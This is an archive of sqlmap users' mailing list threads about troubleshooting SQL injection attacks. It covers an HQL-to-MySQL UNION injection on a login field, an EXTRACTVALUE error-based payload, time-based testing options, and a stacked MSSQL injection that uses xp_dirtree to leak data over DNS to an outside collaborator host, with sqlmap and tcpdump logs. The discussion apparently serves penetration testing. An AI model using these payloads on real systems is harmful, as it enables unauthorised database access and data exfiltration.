sqlmap-users — sqlmap users mailing list

Re: [sqlmap-users] injecting into MySQL through HQL

[Chris O. <chr...@gm...>]

I assume you've tried * for custom injection point and --technique=U?

Whether or not it'll dance with HQL is another question entirely.

On 24 February 2017 at 16:44, Robin Wood <ro...@di...nja> wrote:

> I've just found an instance of Hibernate Query Language injection that
> lets me get at an underlying MySQL database if I inject in the right way,
> some examples I've got are:
>
> loginName=a - works and gives 200
> loginName=' - fails with HQL error and 500
> loginName=a' or 'a'='a - works and gives 200
> loginName=a\'' - gets through HQL and then generates a MySQL error in a
> where clause. The injection gets converted to  where NAME='a\'''
>
> With some playing I've found that this is a valid injection and they are
> running as root as I get a 500 back when I supply root, a 200 when give
> something else.
>
> loginName=a' and 'a\''="a" union select @@version,2,3,4,5,6,7,8,9,10,
> 11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01"
> from users where user()="root@localhost" -- '='1
>
> The 500 is because some of the stuff from the union isn't being handled
> correctly by the page, the 200 is because the union doesn't return any data
> so the first bit (basically a=a) is returning valid data so getting through
> the rest of the parsing.
>
> So I think what I need to do is to tell SQLMap that it is a union
> injection with 31 fields and that the injection needs to go into here:
>
> loginName=a' and 'a\''="a" <INJECT> -- '='1
>
> Can I do this?
>
> I've got all this set up and running in Burp so I can test things out if
> anyone needs me to.
>
> Robin
>
> ------------------------------------------------------------
> ------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

[sqlmap-users] injecting into MySQL through HQL

[Robin W. <ro...@di...>]

I've just found an instance of Hibernate Query Language injection that lets
me get at an underlying MySQL database if I inject in the right way, some
examples I've got are:

loginName=a - works and gives 200
loginName=' - fails with HQL error and 500
loginName=a' or 'a'='a - works and gives 200
loginName=a\'' - gets through HQL and then generates a MySQL error in a
where clause. The injection gets converted to  where NAME='a\'''

With some playing I've found that this is a valid injection and they are
running as root as I get a 500 back when I supply root, a 200 when give
something else.

loginName=a' and 'a\''="a" union select
@@version,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,2,3,4,5,"2001-01-01",2,3,"2001-01-01","2001-01-01"
from users where user()="root@localhost" -- '='1

The 500 is because some of the stuff from the union isn't being handled
correctly by the page, the 200 is because the union doesn't return any data
so the first bit (basically a=a) is returning valid data so getting through
the rest of the parsing.

So I think what I need to do is to tell SQLMap that it is a union injection
with 31 fields and that the injection needs to go into here:

loginName=a' and 'a\''="a" <INJECT> -- '='1

Can I do this?

I've got all this set up and running in Burp so I can test things out if
anyone needs me to.

Robin

Re: [sqlmap-users] Avoid doing 30 connections in time attack

[Rodrigo Z. S. <rod...@gm...>]

I understand your point. But this will be a good thing. This was not the
first time that I have problem with it.

Because I only have X calls before the server crash, obvious I can't dump
long data with it. But there are a lot of userful things like try to know
if I can read/write file. I just need one (or some) call.

Just to point one thing: You forget the human side. I can set a big
--time-sec and I can, myself, see if it is true or false-positive.

Thanks for this change, anyway. Will be userful.

2017-02-14 10:17 GMT-02:00 Miroslav Stampar <mir...@gm...>:

> Hi.
>
> Obviously, don't use --threads in those kind of situations. Also,
> --keep-alive could be a good choice together with (hidden) switch
> --disable-precon.
>
> As of time-based SQLi. Well, without the (as Brandon mentioned)
> statistical model, sqlmap will have a problem. Also, if application is
> doing "sporadic" timeouts I am not sure how in the first place are you
> expecting sqlmap to detect whether there was a deliberate delay or not.
>
> Anyway, I've pushed this moment a change where you can now use
> --disable-stats just for this one thing you are looking for. As of whether
> the sqlmap will now correctly perform tests (by using this option it is
> strictly looking into the response times and doing a dumb delay inference -
> if response time more than one given by --time-sec) I kind of doubt it.
>
> Bye
>
> On Mon, Feb 13, 2017 at 5:47 PM, Rodrigo Zanatta Silva <
> rod...@gm...> wrote:
>
>> Yes, because every call I create an error in the server. So, I can only
>> make X call before the pool of connections was full. Than I need to wait
>> the server close this connections and try again.
>>
>> 2017-02-13 14:43 GMT-02:00 Brandon Perry <bpe...@gm...>:
>>
>>>
>>> > On Feb 13, 2017, at 10:39 AM, Rodrigo Zanatta Silva <
>>> rod...@gm...> wrote:
>>> >
>>> > How can I disable the sqlmap doing 30 connections before start doing
>>> time attack?
>>>
>>> You have to build a statistical model of how quickly the requests
>>> generally return to ensure accuracy during a timing attack. You can’t get
>>> around this. A boolean-based timing attack is going to take a whole lot of
>>> requests anyway, are you really worried about an extra 30?
>>>
>>> >
>>> > There is a options or I need to find it in code? And where is this set?
>>> > ------------------------------------------------------------
>>> ------------------
>>> > Check out the vibrant tech community on one of the world's most
>>> > engaging tech sites, SlashDot.org! http://sdm.link/slashdot______
>>> _________________________________________
>>> > sqlmap-users mailing list
>>> > sql...@li...
>>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>
>>>
>>
>> ------------------------------------------------------------
>> ------------------
>> Check out the vibrant tech community on one of the world's most
>> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li...
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
>
> --
> Miroslav Stampar
> http://about.me/stamparm
>

Re: [sqlmap-users] Avoid doing 30 connections in time attack

[Miroslav S. <mir...@gm...>]

Hi.

Obviously, don't use --threads in those kind of situations. Also,
--keep-alive could be a good choice together with (hidden) switch
--disable-precon.

As of time-based SQLi. Well, without the (as Brandon mentioned) statistical
model, sqlmap will have a problem. Also, if application is doing "sporadic"
timeouts I am not sure how in the first place are you expecting sqlmap to
detect whether there was a deliberate delay or not.

Anyway, I've pushed this moment a change where you can now use
--disable-stats just for this one thing you are looking for. As of whether
the sqlmap will now correctly perform tests (by using this option it is
strictly looking into the response times and doing a dumb delay inference -
if response time more than one given by --time-sec) I kind of doubt it.

Bye

On Mon, Feb 13, 2017 at 5:47 PM, Rodrigo Zanatta Silva <
rod...@gm...> wrote:

> Yes, because every call I create an error in the server. So, I can only
> make X call before the pool of connections was full. Than I need to wait
> the server close this connections and try again.
>
> 2017-02-13 14:43 GMT-02:00 Brandon Perry <bpe...@gm...>:
>
>>
>> > On Feb 13, 2017, at 10:39 AM, Rodrigo Zanatta Silva <
>> rod...@gm...> wrote:
>> >
>> > How can I disable the sqlmap doing 30 connections before start doing
>> time attack?
>>
>> You have to build a statistical model of how quickly the requests
>> generally return to ensure accuracy during a timing attack. You can’t get
>> around this. A boolean-based timing attack is going to take a whole lot of
>> requests anyway, are you really worried about an extra 30?
>>
>> >
>> > There is a options or I need to find it in code? And where is this set?
>> > ------------------------------------------------------------
>> ------------------
>> > Check out the vibrant tech community on one of the world's most
>> > engaging tech sites, SlashDot.org! http://sdm.link/slashdot______
>> _________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>>
>
> ------------------------------------------------------------
> ------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>


-- 
Miroslav Stampar
http://about.me/stamparm

[sqlmap-users] help implement new payload for error based sqli using extractvalue()

[daniel <ana...@pr...>]

Hi all.. first time send e-mail to list =)

My name is daniel, i'm new on contributing to the project..

I trying to implement this kind of payload to the error-based method for mysql, but i'm having some problems..

The payload i want to implement is:

file.php?id=1 and extractvalue(0x0a,concat(0x0a,(query)))--+

I know that 0x0a is the "ENTER" but it can be changed for other chars.. so i replace it for ':' .. that would be 0x3a

I found the error_based.xml file, and i try some modifications but it keeps don't getting the expected results.. I'm trying like this:

<test>
<title>MySQL &gt;= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)</title>
<stype>2</stype>
<level>2</level>
<risk>1</risk>
<clause>1,2,3,9</clause>
<where>1</where>
<vector>AND EXTRACTVALUE(':',CONCAT(':',([QUERY])))</vector>
<request>
<!-- These work as good as ELT(), but are longer
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (CASE WHEN ([RANDNUM]=[RANDNUM]) THEN 1 ELSE 0 END)),'[DELIMITER_STOP]'))</payload>
<payload>AND EXTRACTVALUE([RANDNUM],CONCAT('\','[DELIMITER_START]',(SELECT (MAKE_SET([RANDNUM]=[RANDNUM],1))),'[DELIMITER_STOP]'))</payload>
-->
<payload>and extractvalue(0x3a,concat(':',(select '[DELIMITER_STOP]')))</payload>
</request>
<response>
<grep>':'(?P&lt;result&gt;.*?)[DELIMITER_STOP]</grep>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version>&gt;= 5.1</dbms_version>
</details>
</test>

And i want to don't test for WHERE, HAVING or ORDER BY... just with AND..

Sorry my bad english hope you could understand =)

best regards,

daniel.
github.com/chr0n1c




Sent from [ProtonMail](https://protonmail.com), Swiss-based encrypted email.

Re: [sqlmap-users] Avoid doing 30 connections in time attack

[Rodrigo Z. S. <rod...@gm...>]

Yes, because every call I create an error in the server. So, I can only
make X call before the pool of connections was full. Than I need to wait
the server close this connections and try again.

2017-02-13 14:43 GMT-02:00 Brandon Perry <bpe...@gm...>:

>
> > On Feb 13, 2017, at 10:39 AM, Rodrigo Zanatta Silva <
> rod...@gm...> wrote:
> >
> > How can I disable the sqlmap doing 30 connections before start doing
> time attack?
>
> You have to build a statistical model of how quickly the requests
> generally return to ensure accuracy during a timing attack. You can’t get
> around this. A boolean-based timing attack is going to take a whole lot of
> requests anyway, are you really worried about an extra 30?
>
> >
> > There is a options or I need to find it in code? And where is this set?
> > ------------------------------------------------------------
> ------------------
> > Check out the vibrant tech community on one of the world's most
> > engaging tech sites, SlashDot.org! http://sdm.link/slashdot______
> _________________________________________
> > sqlmap-users mailing list
> > sql...@li...
> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>
>

Re: [sqlmap-users] Avoid doing 30 connections in time attack

[Brandon P. <bpe...@gm...>]

> On Feb 13, 2017, at 10:39 AM, Rodrigo Zanatta Silva <rod...@gm...> wrote:
> 
> How can I disable the sqlmap doing 30 connections before start doing time attack?

You have to build a statistical model of how quickly the requests generally return to ensure accuracy during a timing attack. You can’t get around this. A boolean-based timing attack is going to take a whole lot of requests anyway, are you really worried about an extra 30?

> 
> There is a options or I need to find it in code? And where is this set?
> ------------------------------------------------------------------------------
> Check out the vibrant tech community on one of the world's most
> engaging tech sites, SlashDot.org! http://sdm.link/slashdot_______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

[sqlmap-users] Avoid doing 30 connections in time attack

[Rodrigo Z. S. <rod...@gm...>]

How can I disable the sqlmap doing 30 connections before start doing time
attack?

There is a options or I need to find it in code? And where is this set?

Re: [sqlmap-users] Sqlmap/DNS exfil

[Brandon P. <bpe...@gm...>]

> On Dec 19, 2016, at 5:10 PM, Mark M. <vv...@ho...> wrote:
> 
> Right, that makes sense.  But at the same time, this is a valid injection (I can reproduce it manually).  Perhaps there's information I can provide to someone that would help improve the tool so it would catch this particular case and others like it?

Why not run sqlmap through burp suite (—proxy) and manually look at the requests it is making to figure out what the differences are in the request you can make work and the ones sqlmap is trying. Maybe you need a tamper script or something needs to be massaged that burp was able to do without intervention.

> 
> 
> On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>> wrote:
> 
>> As said, there should be at least one other SQLi technique available. In your case there is NONE. sqlmap will not blindly use dns-exfil if at least one other technique worked.
>> 
>> Bye
>> 
>> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho... <mailto:vv...@ho...>> wrote:
>> Thanks, that's good advice.  And I probably should post a little more detail on what I'm running here so others can see it as well.
>> 
>> 
>> Here's the command executing:
>> 
>> 
>> 
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=dns.lanternsec.com <http://dns.lanternsec.com/> --force-dns --dbms "Microsoft SQL Server" --os "Windows" --threads 1
>>         ___
>>        __H__
>>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
>> |_ -| . [)]     | .'| . |
>> |___|_  [']_|_|_|__,|  _|
>>       |_|V          |_|   http://sqlmap.org <http://sqlmap.org/>
>> 
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program
>> 
>> [*] starting at 16:56:14
>> 
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option '--headers/--user-agent/--referer/--cookie'. Do you want to process it? [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page comparison on a sequence matcher. If no dynamic nor injectable parameters are detected, or in case of junk results, refer to user's manual paragraph 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based - WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable. Try to increase '--level'/'--risk' values to perform more tests. Also, you can try to rerun by providing either a valid value for option '--string' (or '--regexp'). If you suspect that there is some kind of protection mechanism involved (e.g. WAF) maybe you could retry with an option '--tamper' (e.g. '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>> 
>> [*] shutting down at 16:58:03
>> 
>> 
>> 
>> And then, my capture results for DNS traffic:
>> 
>> 
>> 
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA? www.testsite.org <http://www.testsite.org/>. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>> 
>> 
>> It doesn't seem like an injection pattern is being tried that is getting the DNS exfiltration to occur... or else I'm doing something else wrong.
>> 
>> Thanks,
>> 
>> V
>> 
>> From: Miroslav Stampar <mir...@gm... <mailto:mir...@gm...>>
>> Sent: Monday, December 19, 2016 4:10 PM
>> To: Mark M.
>> Cc: sql...@li... <mailto:sql...@li...>
>> Subject: Re: [sqlmap-users] Sqlmap/DNS exfil
>>  
>> I would suggest you to run the wireshark or similar when running the --dns-domain to properly debug what is going on. There could be really lots of problems before you fine tune it (e.g. other service running on :53).
>> 
>> About the "forcing" sqlmap for using dns-exfil. It will always at least try to test it at the start of a run (if other injection technique available). Also, it will prefer other "faster" techniques (ERROR and UNION) over dns-exfil. However, there is a hidden switch "--force-dns" which will force the usage of dns-exfil even if ERROR/UNION are available.
>> 
>> As said, the best advice I can give to you is to run the wireshark during the run and really see what is going on.
>> 
>> Bye
>> 
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho... <mailto:vv...@ho...>> wrote:
>> I have a situation where Burp has detected the following DNS exfiltration injection for a query parameter in a web app:
>> 
>> 
>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'%2b'orator.net <http://orator.net/>\rtf'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20 HTTP/1.1
>> 
>> 
>> 
>> To make that a little easier to read, the injected value is:
>> 
>> 
>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9fw5ku.burpcollab'+'orator.net <http://orator.net/>\rtf'; exec master.dbo.xp_dirtree @q;--
>> 
>> 
>> I've modified the domain and verified that I receive the DNS requests on my local DNS server (the domain which I provide to sqlmap using the --dns-domain=xxx option) when the injection is manually sent to the page.  The problem is, when I pass the request to sqlmap it's not detecting that there's an injection at all.  I've provided the OS/DBMS and --level 5, but still no dice.  I'm using sqlmap v1.0.12#stable.
>> 
>> 
>> Since I've gotten many other injections to work in the past, I believe that I'm using sqlmap properly (formatting my request in a file appropriately, specifying the correct parameter to test, etc.)  However, it surprised me that what appeared to be a fairly straight-forward stacked SQL injection would slip by all of sqlmap's tests. Is there a way to force sqlmap to try DNS exfiltration injections despite no other injection technique succeeding?
>> 
>> 
>> Thanks
>> 
>> V
>> 
>> 
>> 
>> ------------------------------------------------------------------------------
>> Developer Access Program for Intel Xeon Phi Processors
>> Access to Intel Xeon Phi processor-based developer platforms.
>> With one year of Intel Parallel Studio XE.
>> Training and support from Colfax.
>> Order your platform today.http://sdm.link/intel <http://sdm.link/intel>
>> _______________________________________________
>> sqlmap-users mailing list
>> sql...@li... <mailto:sql...@li...>
>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users <https://lists.sourceforge.net/lists/listinfo/sqlmap-users>
>> 
>> 
>> 
>> 
>> -- 
>> Miroslav Stampar
>> http://about.me/stamparm <http://about.me/stamparm>
>> 
>> 
>> -- 
>> Miroslav Stampar
>> http://about.me/stamparm <http://about.me/stamparm>------------------------------------------------------------------------------
> Developer Access Program for Intel Xeon Phi Processors
> Access to Intel Xeon Phi processor-based developer platforms.
> With one year of Intel Parallel Studio XE.
> Training and support from Colfax.
> Order your platform today.http://sdm.link/intel_______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users

Re: [sqlmap-users] Sqlmap/DNS exfil

[Miroslav S. <mir...@gm...>]

I would say that tool doesn't need to be improved with your case. Please
inspect what is going on by manually injecting testing payloads coming from
sqlmap (use for example -v 3).

I am pretty sure that something is wrong with your setup or the other end
is blocking some of requests.

Bye

On Tue, Dec 20, 2016 at 12:10 AM, Mark M. <vv...@ho...> wrote:

> Right, that makes sense.  But at the same time, this is a valid injection
> (I can reproduce it manually).  Perhaps there's information I can provide
> to someone that would help improve the tool so it would catch this
> particular case and others like it?
>
>
> On Dec 19, 2016, at 5:04 PM, Miroslav Stampar <mir...@gm...>
> wrote:
>
> As said, there should be at least one other SQLi technique available. In
> your case there is NONE. sqlmap will not blindly use dns-exfil if at least
> one other technique worked.
>
> Bye
>
> On Tue, Dec 20, 2016 at 12:01 AM, Mark M. <vv...@ho...> wrote:
>
>> Thanks, that's good advice.  And I probably should post a little more
>> detail on what I'm running here so others can see it as well.
>>
>>
>> Here's the command executing:
>>
>>
>> root@bass:/scans/NAED/2016# sqlmap -r sqlmap-request4.txt -p
>> ProductCategory --force-ssl --level 1 --risk 1 --keep-alive --dns-domain=
>> dns.lanternsec.com --force-dns --dbms "Microsoft SQL Server" --os
>> "Windows" --threads 1
>>         ___
>>        __H__
>>  ___ ___[.]_____ ___ ___  {1.0.12#stable}
>> |_ -| . [)]     | .'| . |
>> |___|_  [']_|_|_|__,|  _|
>>       |_|V          |_|   http://sqlmap.org
>>
>> [!] legal disclaimer: Usage of sqlmap for attacking targets without prior
>> mutual consent is illegal. It is the end user's responsibility to obey all
>> applicable local, state and federal laws. Developers assume no liability
>> and are not responsible for any misuse or damage caused by this program
>>
>> [*] starting at 16:56:14
>>
>> [16:56:14] [INFO] parsing HTTP request from 'sqlmap-request4.txt'
>> [16:56:14] [INFO] setting up DNS server instance
>> custom injection marking character ('*') found in option
>> '--headers/--user-agent/--referer/--cookie'. Do you want to process it?
>> [Y/n/q] n
>> [16:56:16] [INFO] testing connection to the target URL
>> [16:56:18] [INFO] testing if the target URL is stable
>> [16:56:19] [WARNING] target URL is not stable. sqlmap will base the page
>> comparison on a sequence matcher. If no dynamic nor injectable parameters
>> are detected, or in case of junk results, refer to user's manual paragraph
>> 'Page comparison' and provide a string or regular expression to match on
>> how do you want to proceed? [(C)ontinue/(s)tring/(r)egex/(q)uit] C
>> [16:56:22] [WARNING] heuristic (basic) test shows that GET parameter
>> 'ProductCategory' might not be injectable
>> [16:56:23] [INFO] testing for SQL injection on GET parameter
>> 'ProductCategory'
>> [16:56:23] [INFO] testing 'AND boolean-based blind - WHERE or HAVING
>> clause'
>> [16:56:33] [INFO] testing 'Microsoft SQL Server/Sybase AND error-based -
>> WHERE or HAVING clause (IN)'
>> [16:56:38] [INFO] testing 'Microsoft SQL Server/Sybase inline queries'
>> [16:56:39] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries
>> (comment)'
>> [16:56:39] [WARNING] time-based comparison requires larger statistical
>> model, please wait......... (done)
>> [16:56:56] [INFO] testing 'Microsoft SQL Server/Sybase time-based blind
>> (IF)'
>> [16:57:01] [INFO] testing 'Generic UNION query (NULL) - 1 to 10 columns'
>> [16:58:03] [WARNING] GET parameter 'ProductCategory' does not seem to be
>> injectable
>> [16:58:03] [CRITICAL] all tested parameters appear to be not injectable.
>> Try to increase '--level'/'--risk' values to perform more tests. Also, you
>> can try to rerun by providing either a valid value for option '--string'
>> (or '--regexp'). If you suspect that there is some kind of protection
>> mechanism involved (e.g. WAF) maybe you could retry with an option
>> '--tamper' (e.g. '--tamper=space2comment')
>> [16:58:03] [WARNING] HTTP error codes detected during run:
>> 500 (Internal Server Error) - 98 times
>>
>> [*] shutting down at 16:58:03
>>
>>
>>
>> And then, my capture results for DNS traffic:
>>
>>
>> root@bass:~# tcpdump -n -i eth0 udp port 53
>> tcpdump: verbose output suppressed, use -v or -vv for full protocol decode
>> listening on eth0, link-type EN10MB (Ethernet), capture size 262144 bytes
>> 16:56:16.645859 IP 97.87.91.210.47713 > 8.8.8.8.53: 22969+ A?
>> www.testsite.org. (30)
>> 16:56:16.645879 IP 97.87.91.210.47713 > 8.8.8.8.53: 384+ AAAA?
>> www.testsite.org. (30)
>> 16:56:16.676832 IP 8.8.8.8.53 > 97.87.91.210.47713: 22969 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:16.677665 IP 8.8.8.8.53 > 97.87.91.210.47713: 384 0/1/0 (117)
>> 16:56:16.688473 IP 97.87.91.210.60615 > 8.8.8.8.53: 55855+ A?
>> www.testsite.org. (30)
>> 16:56:16.688496 IP 97.87.91.210.60615 > 8.8.8.8.53: 38904+ AAAA?
>> www.testsite.org. (30)
>> 16:56:16.730136 IP 8.8.8.8.53 > 97.87.91.210.60615: 55855 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:16.731688 IP 8.8.8.8.53 > 97.87.91.210.60615: 38904 0/1/0 (117)
>> 16:56:59.067583 IP 97.87.91.210.56778 > 8.8.8.8.53: 2671+ A?
>> www.testsite.org. (30)
>> 16:56:59.067619 IP 97.87.91.210.56778 > 8.8.8.8.53: 15627+ AAAA?
>> www.testsite.org. (30)
>> 16:56:59.105567 IP 8.8.8.8.53 > 97.87.91.210.56778: 2671 1/0/0 A
>> 173.213.231.200 (46)
>> 16:56:59.112534 IP 8.8.8.8.53 > 97.87.91.210.56778: 15627 0/1/0 (117)
>> 16:58:04.047464 IP 97.87.91.210.56624 > 8.8.8.8.53: 420+ A?
>> www.testsite.org. (30)
>> 16:58:04.047488 IP 97.87.91.210.56624 > 8.8.8.8.53: 9755+ AAAA?
>> www.testsite.org. (30)
>> 16:58:04.079012 IP 8.8.8.8.53 > 97.87.91.210.56624: 420 1/0/0 A
>> 173.213.231.200 (46)
>> 16:58:04.079921 IP 8.8.8.8.53 > 97.87.91.210.56624: 9755 0/1/0 (117)
>> 16:59:09.078601 IP 97.87.91.210.40911 > 8.8.8.8.53: 52733+ A?
>> www.testsite.org. (30)
>> 16:59:09.078623 IP 97.87.91.210.40911 > 8.8.8.8.53: 63191+ AAAA?
>> www.testsite.org. (30)
>> 16:59:09.104935 IP 8.8.8.8.53 > 97.87.91.210.40911: 52733 1/0/0 A
>> 173.213.231.200 (46)
>> 16:59:09.113262 IP 8.8.8.8.53 > 97.87.91.210.40911: 63191 0/1/0 (117)
>>
>>
>> It doesn't seem like an injection pattern is being tried that is getting
>> the DNS exfiltration to occur... or else I'm doing something else wrong.
>>
>>
>> Thanks,
>>
>> V
>>
>> ------------------------------
>> *From:* Miroslav Stampar <mir...@gm...>
>> *Sent:* Monday, December 19, 2016 4:10 PM
>> *To:* Mark M.
>> *Cc:* sql...@li...
>> *Subject:* Re: [sqlmap-users] Sqlmap/DNS exfil
>>
>> I would suggest you to run the wireshark or similar when running the
>> --dns-domain to properly debug what is going on. There could be really lots
>> of problems before you fine tune it (e.g. other service running on :53).
>>
>> About the "forcing" sqlmap for using dns-exfil. It will always at least
>> try to test it at the start of a run (if other injection technique
>> available). Also, it will prefer other "faster" techniques (ERROR and
>> UNION) over dns-exfil. However, there is a hidden switch "--force-dns"
>> which will force the usage of dns-exfil even if ERROR/UNION are available.
>>
>> As said, the best advice I can give to you is to run the wireshark during
>> the run and really see what is going on.
>>
>> Bye
>>
>> On Mon, Dec 19, 2016 at 11:03 PM, Mark M. <vv...@ho...> wrote:
>>
>>> I have a situation where Burp has detected the following DNS
>>> exfiltration injection for a query parameter in a web app:
>>>
>>>
>>> GET /XXXX/Store/Page.aspx?ProductCategory=45'%3bdeclare%20@q%20v
>>> archar(99)%3bset%20@q%3d'\\q8zg3ptwdhvp9ep7ppaxdfvpngt9uxlo9
>>> fw5ku.burpcollab'%2b'orator.net\rtf'%3b%20exec%20master.db
>>> o.xp_dirtree%20@q%3b--%20 HTTP/1.1
>>>
>>>
>>> To make that a little easier to read, the injected value is:
>>>
>>>
>>> ';declare @q varchar(99);set @q='\\q8zg3ptwdhvp9ep7ppaxdfvp
>>> ngt9uxlo9fw5ku.burpcollab'+'orator.net\rtf'; exec master.dbo.xp_dirtree
>>> @q;--
>>>
>>>
>>> I've modified the domain and verified that I receive the DNS requests on
>>> my local DNS server (the domain which I provide to sqlmap using the
>>> --dns-domain=xxx option) when the injection is manually sent to the page.
>>> The problem is, when I pass the request to sqlmap it's not detecting that
>>> there's an injection at all.  I've provided the OS/DBMS and --level 5, but
>>> still no dice.  I'm using sqlmap v1.0.12#stable.
>>>
>>>
>>> Since I've gotten many other injections to work in the past, I believe
>>> that I'm using sqlmap properly (formatting my request in a file
>>> appropriately, specifying the correct parameter to test, etc.)  However, it
>>> surprised me that what appeared to be a fairly straight-forward stacked SQL
>>> injection would slip by all of sqlmap's tests. Is there a way to force
>>> sqlmap to try DNS exfiltration injections despite no other injection
>>> technique succeeding?
>>>
>>>
>>> Thanks
>>>
>>> V
>>>
>>>
>>>
>>>
